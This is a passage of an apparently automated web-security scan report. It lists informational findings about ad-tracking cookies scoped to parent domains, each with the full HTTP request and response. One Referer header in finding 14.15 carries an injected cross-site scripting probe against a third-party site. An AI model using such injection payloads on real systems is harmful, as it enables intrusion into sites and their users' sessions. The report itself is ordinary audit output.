Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:46 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270266; expires=Wed, 21 Sep 2011 18:37:46 GMT; path=/; domain=.questionmarket.com
Content-Length: 3840
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...

14.11. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1316264640.321,wait-%3E10000,&1316282687360 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_G=method->-1,ts->1316264639; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:56 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

14.12. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:03:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:03:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1316264639; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28160

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...

14.13. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000001&c7=http%3A%2F%2Fwww.msn.com%2F&c9=&rn=1316281313735 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 17 Sep 2011 12:41:14 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 12:41:14 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


14.14. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportallille&d.x=13228639&d.t=page&d.u=http%3A%2F%2Fglo.msn.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://glo.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 12:46:45 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633]]>>; expires=Mon, 16-Sep-2013 12:46:45 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

14.15. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=I09839 HTTP/1.1
Host: js.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate=home.ascxe81bd%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E384de482b57
Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; rtc_Xof4=MLvn8qEOYT5j57gfE729LhbkdUZ/Fm9flNSl1e+gREjG6tL0/JhXn3pmSJXYVrl2zwdgWhGtJY2neNa/R2Xpo2Y3tQekBoSF5xDCM3Gz70795K6387Dgzx2U95dVGRyFT8tm2wHiMJ5Prft6rSwyJZJjl0I/09K8ufd4T0h/DejwZOHQrQmhwNa+zQekuinO/ZJb9Aw5OQ0tc7jXxllKJ18MB/ZHhfS0hzulVGMBJKIxXSeCDq1j2/zUw5wPyFNIguAvR9FWCb47SkDZfFBkFkznDSs32PkmJxxcU4TOtHXnxu7xI3uvrs2rUkk+qACgmS5n/WfNAS0X+8eSnoWi88WnJ4Dh1BTB4sSY9w34PeQQhkL81JbB8Sa+DGs47hPM22en8a74hMxDMPmPdTB2pC0Ts5mOC0uy/k+p/bd9T9zkSZPdUOYKjamYfwIIIHUUUyHiKGuKEecW8zJaY1PKYZTvFbDEKHrY4sKDQgbVxMM2g475nlTlhcfTlx3Z4ooAWBWH0hKowDQIAxHzWPU9OKoh5xJWmNeASKT04ZxByhBzxoslzwdixDH30BHWr5mrUfhbl9t73IxBElBEJlxnWoZVcby8JXyT3aYnphENcngWTsxkRJsPM8Xlg5itywH5MM/h8yyjf91409rHDX8PG9+GWBRN6hiksjEixQsWP+LXrwDENckR1imnZscPBnRIztp2S/JaBsd5ZnHGQJ1l3nnlng==; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; rsiPus_OuYw="MLsXsFMNJi5npgBlK1GvRXjKr8jXeBM676apKCjon0PoR2BlWkU6QiFS5AQxH9ekd3klW0PdyoBMblNhpC4HewJ49MPhRAQohjYEW01hnZIb6S+yjQVwia85JT0yNFCyBFdLz0ckcEpNhJzznYiPSFjV+clP/7aazuVvHx2RNCMahPlFrED1gH2C9re7ZYtZR7nykpOULNFGTmyYqxsGpbrIGyaodlppi9p5WIXxhXZUfBewQ8CnzkeyQoSDbFBEnGn4dB9/XFWaaF2iHrfvP2/tH8CXhyRj1lqXftgCkSJ3dlyeEIm3kU5sqFnvR7B6yfhuBWt2d5OCmbmLBItrqNJepQnurWDx7pIZylfc28q/hQQ1Rfc0oFUHxInRKcNesjFxIfBUp7X2un5OKgADJyl4OOWxMEvDzaCm+Uw7wYWngwKRO2bJvWcqnx8yv/ZjAvIJqVt/8swTUhHrwyDhM9mLJcZj/MTOtKA43VI6V2uD3NbFqP5xGg/+Md0Alw+oZdFio0tSwRJQjR17yprxI3Bz8caVbzTcOTpTOU5I6rYCTwTCfCOGDiR5z7wFiM7j3b1wyLPDiw=="; rsiPus_xgUL="MLsX8FMNJi5nZmyuhwamDZURKQh4ku6Fu/MiXxBeciJerUI3RrBmeOzGfoxcAnkqaEp3frUhMhp9dPD8M7I2ZffF60tNbFoC9WY2UwnkxrTmnFx/wjJwCUKaah4t14tzWEpVvD7yvDHIo5bqXap3vaLaa0FXJ7S5o7+81ezBFBUB6mR32qFfh4Kn03gQgpI5dYhG8wqnnah2JqiwixCG+ECl8otv+mHdxP0VqPKP2E5dzqZRk9LHYSNMfHVjKJtDq+XLqKX5owgOpKK74PTM7YMs1d6MFHSBEFio8uvKpqDLHk9GwKjOVnFBm6pBwL2YK2CTzH55noSyhwv3aUjV2fjaBGRfQuSYzb+CLc9PQAQhyyyslXmstMZkZKvBrAb1Zux4Olytn++8msd62vZxI0N/bhuJuTAmoD1M8RgWpHqWN4ZC6jjokQ3rUTqQ2VNaWg5NUhzFDO5s8jHvKj3f5tHYiToPCOm/pjM7fGkk9CXfd13EkIOKk61gjI9PrnyZwh00InTKMBTOYtxZ1nyRZsqwgcu6dTALyzRxzrrTiCCg6DkuhyNvCrbxnfUN6PM+u80HZU0hvTQAPlglOMpEQvWcOjgMxnwcwDCUtKtDjmWHLel8yT7JCKtOYnfDHsFY3QEYyo83P1amaw=="; rsiPus_5Crz="MLsXsFEtpz5r5pD2EhhKJvMKybZ8kZyunI3prG0OG598rhBxqW69HWZVaXTzv43gws7/x8n+FW+nJHAAz82VDFHdLU9NbPYCJfWm+bWV2AxuD6aDB9WfijUxEv5cT2qX6MUIOT3FNG0ZiY7h5YLr+rm8a0FX2sSZk7+8VZL5EB4F7CQMA/EId/ol7kTgcoRvQfw9Ao1rQt4MtjXEClV/odpSsgAiv6p8t84i/yScJEpeQpeXZ6MsFfYXdfxi5WFI0lblSzN+sSiaY/Q5HGgrJoGWXKoInAhep0QTTL4Jdmsf+SCI+leqUIRwwn23wq5R8d7RRaBB0AwiKNHTpKKFSMySlQlyD68p6dKBr9yt6aywv4g7l1QOekvBMwFKcsyjNB1DxSSax4ywhNyhI8TitD6vfdCzbHmgrzDxBFXINAwjTJOf6b/GW/O5BPpQ8uNAMwhPRsD1dePx/kdEKHWVVR0I02wcYvX4oyM8IRWaPx/O2SI7LJ626i1Mfa1WLM2ppEULPsIa1kTWZ187yyJzeP2aV6R7+ehjUFay88PEDN1Tds0K6PvmIIantWzcXBwZ+h0h6jpVJfHdwAn0i//r6BpyCByF6pVKG08O3fLx9qMRT/nFD9crSir6H41JjBcAl4p4dkbnwg=="; rsi_us_1000000="pUMdIzlHMBYUlf2MMbu1n6bVETdvfD/OzxbY8rfFU1OQb8x+muMJYpggQiFqwXAMdIisASPJ065BmL0GMTmPtiecIFIw1bTh+dzYrQm2UlCjVRyFusJ6Vbix3tPJ5CN7uu0ApaNRpLHjW60Je3pwOF06SCh7nG3N18j8qAnTjxdVZdJpkTTk4stVSXHeztv8fsAJax5J5J1ljF3+dDYBUIz2N6aeVu2ruLL7Oj/c0YI7SFFQi2pkxHrE6wg0z8ZUaq2HBPx0kJ0PFmPh91LWNgMNuf6MVfEJY0f0RRRmCiR3jDMkAF70b1vkrELQNw/A6EF8Cyx3LFeO+IOFjW56zXx30kg8s9E8/gQ8p5JrkXm9UXHrKVsX+tMjfAbrhIgDbmSQgDUN5TOH+ACC2ccQWTzqNMwedw9/PcbCwA/wTz/+UZiZdeVGQPP6Zq/Hg4CAtuLpIZpw4ywDzvOMGxCtiRYNdZdDKuWe/sxK9PM1FpYpbb6UYcrg1i/D2j2x+g3d3OKKsIJYcb4E4xvV0CQXv397niegVSWlT0bEsw1widtA9YaDQ2I3hcVd3UaC7DyRnLJp1UBTYri3BwvJQu6NQ+OQuZxDRZR9KTx+QX8asZmLqfMmOj+6LpnU4KXpM6WtMSLIZ6FolYNRFmfi7bCq5Ll1zm1AePVDPg+uSB6eoCCGz5Luk/mnK1ckmU59A68Mywz5bXnOmP6HDeQ7vg3t7L7w72DqjASp/PTy+Bw3Dbz+WhlSOLUeyRhVlJMfsudUEQByDtAXRp4nGKaSuF5fMdDvTQy8cD+mhB1ZFTubPiBVckcvzFBbCrCMpS2cA8Qwf4mh1pVm+aOTa+QYe1+MBnz9G8QKi1Fqp9RldsGXJo4fvH1kSzQWu+YbMKtu6NuGD7xOoCgoRKefHpdHAbnhsLtWs6XgYtvQj1zR9NBE8uwtOZvxILslEpGrauOuCvT7lHcZuEGu8xbtiZ+hzC3QdL+SVjtk+GjRIWM/W4Ef3XVwB8DYA3nLqXoWTnQV0fMjG1I1IGoM61khs5XO9dx4Q0vuMgRlhNtIttHevtKE645cfqrKwmlqCEA2Mo+UcJsL/wlU1BgX9FF54F5hEaao/otyURWjfxM/MRds9E1Q5NeMBiLKazNyP68Ls2ZiClKwYA5WJs3ekRmSXqWKAY6d9erjzQQK94B8xga6thffohr3hTJtXcxbUyyXBSBZoW/WvCq6IeGS6qscibwSVe4ZE1DkpR3khAnT8JqLXnfh0pq5wWBSvMTulLYXWA=="; udm_0=MLv3NCMJaSprXRdgl7/Be8T0ZEDoyHXLvN5yYaeHcjC63fx5ewQAynTQIhPVoVfL+IOpjNyfpGlQgsAgEW7MkKtyKcifzKcx0C10lRJo46VrRHjqe3Roc0Iue5IFRip/ChyXWl6tFID+rcWexo1djbF+Tz0z03rIInEjzVO4OEpi9Jy35mo9UaujVNA4ZKjdj7egNAqOp2cBRZAJGS82dX/HtjrgrGD0nIIBkC1K1KyLRz1SlRSYlj36LRqbrQvOHrDogSObi6IZNexL47jEuthiyzXkgeCA9hQhYQmqVmYKaaHkiU8sIi05sWvEHAP6M+ibJbaawm/3636+seoSxLqfE0mpg04ffG6CWEu9u2DvKMhzQMykcAo1W4CxuYJJCrpQQc53MnKtOTl/eHFv6YamCvKuBubUJ3PDrjDrQi4Vh2bX/MWrFNvCI4+gr46b0pyrvgxDFyxgwGpl8f679h3QqKu1UeOLRuIZAio6Tn7D4irQDqerMSyVg7iNfr3Yk5ORGOFordHGYpvy42v3RbERIAfg2GQk/xrWkv2IXLOUZqHibR9VAUL9JgLx5CqUrgOybkiiTHLYw/yMi5uxDy8jNbcXMbAiJyi9uEBl8W8JLGeViImuvsFEYWVmpl4KUpqO7bE6yOkKnfMhi9OF7zlnExCKDpzE3jMixoqbKQeuKt2gbXNOI+DiCAapOF8KNSoUb6TITY5/JrTLYTWHI8AvKjbxV8WRMZiYtArpQirJaZmRt3xjs/JvU2cZ0xgDuPGNJ7eHUk67GV29K7CJPCo4oZOaeCcvNj1rHD3RFezCWV6YhQW2jo0b4l888RQtu9loKYzZF7cF1qEZVY9JHjV9hvto7H8H1vSjg2m/pP3Ozk2UuEGNVDBdYg8IdFOeIC+aWOhQYDRLeDKak0vZI7+emQLFTXqGsQGA6+k41NuoJ0TK6wwoACfUsA2LRxM3S1X99Dk9OieYTLewtbXSPpqOnjLxbBsRiR05Yx/Q7qx46sa3lx1FCMmRl33U+EH8xZ1cRP/2oU8r6G5tC5o/KbRQfA92GUbqfelZXcbaKeNN/P3RS+l5ZlAs+enEoZQl/Xg/JHQplxoc64xuyXntuyuEsJm/ki4P0eJgB0jWNpZksmWyJOKaXUTq1izdVWKJBwxZWEHCoHY3vtbzZHz3rMbyQshbYVVPAOVof+p1XTX5pUg/yjlF3DIqDZ6rrNgXzcaRiqum/8lrPbaGm1oSl3lEXuaMbxsyEFL97iGS6CZTwDL54qk9IT6VMN9L9f7eRQ0Du0IXyYUEZT2/IUevvx6GH8LHtkBfVGWOLymKGJRnSihWHUjw2MSbeA6dph8nL0XwpgivZhZ0UHJFQVeieblFgTnOYBV/I7J/CsL4kGZZRcIqx4lTyDlbffzm57gh226vozQBLTReYNZWbM5n0RpDjBOdFxhHwuM=; rsi_segs_1000000="pUPFJkOBb3IQV+Ubea77UACbRNo8W3wOBKzagTEaRHs7MiO0U2rjoS2ouxUK6pw26DoqmdXj5mzAQCOhsLMwAg/BVuSssX26D3w7r78D/X/ICzbfWcmIZjZhBhW2mMDSMdqLrr9WaE4U+6eBzBxd8hyY5bU6bhonR9FDEEm9T4mghGtoluIoeJq7wO35gaQSc59PlYqC3peL0GG4KGbawFu2B2g4H/USp1IbXBCBcUtcKXfGFTwzQenAmzZqCmvHNlfLM5lz3aFm5ghLVhCKQW9WwQkMVPdhh71fAOhkc7x5ThtXF6i0C79bRBYoFMSgaMO8wfCfZWo88cnXcI8="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvNC8JZjpr3hepv03QX8AE8YwJLkXmxG8JxJY6miRpTrlTOjX/Y2OCll+Bt80SmpSIWwjkTOZB0ulTpYYkYY26o+h7F8Jn+/1xn/3os6XlVNAH0LB5h6HhI08Ru+nNOBYvAbuNEpzbP4z8z9iOftvgjA+5ynT3pEaEidNrgBZSDqg9FxZzzHmLn0I++FMl3tsUB+e634Isc+tzVMhYfmnjxFc3BxwPqL3JaQ1IcSQHmX3as5QBp93JnApei6qANd+EJYB/CX3uSuKoyk88JfsW9TZMFMth5xS+ZHKJGPxwlVn0aexP/Wj/qvUK/BH6Q2pFjRosm5S9Wicy+hQovnvsriqDLlYC8MIgQQTlCUq8xmEazEgUFeGkCoVmFrgZBQ/sqBVZMCEQiZsodOMd/bXGKFC0oQV3lhY05i1btsJslkz76KmvPwxOME1mPe0r3Z6AYuShxorNR+8lcu81BhNH8gia0BXp0uLnZH+0dSd9cGvFPGm3l/g0kwwti6CugcvMnLftRWDWyM1hssb1jAFxlfI6L8+B3ISFem3YhabkJGfwebiYmOIp1QBcLX0ONsitDKM/yVEmKjbBlJyXD9l/OufYxOD6+EQfBj1ldG7XFWcVqKmWjt1AUOWYprwBC6AcstatfzBjZI8lQ4+DO7Vs49tiEbMZkC217MtL/K47Uu21+MjGJ4VDMoQOE8gHvUNGQ/qMi3/jKaOzRBnX3XiHHtEbQeVz2tgdNQYJB7oB+/5vybLrJsSud3cT1ujQ1NQsj53Ds7by+dUvCfVzA1zb19DezkCHVanpYMLL3wWlL7GAwJe1GKmSQ3zKvrgPWaPulxDezK0Jto76/2ZRa1e6bgmq/r6LuqvLbRmI5mt76/X1ySWSlkOYKf2X91bY+iII9ei194od+UnAl7AqCkxOzF1nLfuEog45rTaxNANYdTKAvlq07YSWpF5stKaNbFWv+epYzv77zKEzS4iI7eta7FyZiuZrQFPE/o2ig7NhjwC2Vp6I+Y/fnpAKXPsbYl33n5x8rJcMrtUNxU7makpiEdWof5mRmA4cy9TWo4o8yiTQhrmCSSqgb9OfxoKxZv451KZX0Eeci9zT0sjxMqT3kL4caL/3jTB7jEYUMVrE4wVQOcdYjY0Lrs/+nYjr+B19YfAWivqpd2xcYkJ0WHm9UO5jk+vwj21S7KjQ8K/sdzwBLRtUhLUWRjlRELsThpw/txYBiK8/WcdKWrHKpLF9SXGOdKcJa+WY5u41fFG7xSc5so+Li6BTS1fcgj5aPQdFstBMFjv3vh/jWWk+MS8vfD7O24d3jyyfXvwr6DmnhIcvxV1IW7JnAxl5xuZfjlxR4DZorEIhGb1sO0SrQN0WXNjEdETiHBKL8bylu7wrUDS97GtUVlFuRdNebzOkQySc0/x7CWlBUFt7bB7prNM1NTFmlYF2DazWHoB4e45/sV5yNHJNxFBBRDUCljxoIgZdu6iOKA63a2HfZT1jpQY=; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 14:35:47 GMT; Path=/
Last-Modified: Sat, 17 Sep 2011 14:35:47 GMT
Cache-Control: max-age=3600, private
Expires: Sat, 17 Sep 2011 15:35:47 GMT
X-Proc-ms: 10
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 14:35:47 GMT
Content-Length: 4598

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'I09839';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...

14.16. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4e37104432fe1148 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh53.html
Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315247534049%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 14:44:01 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C; Domain=.33across.com; Expires=Sun, 16-Sep-2012 14:44:01 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8746800456&seg_code=33x,6940,100043,100072&random=397105
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


14.17. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e37104432fe1148&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh53.html
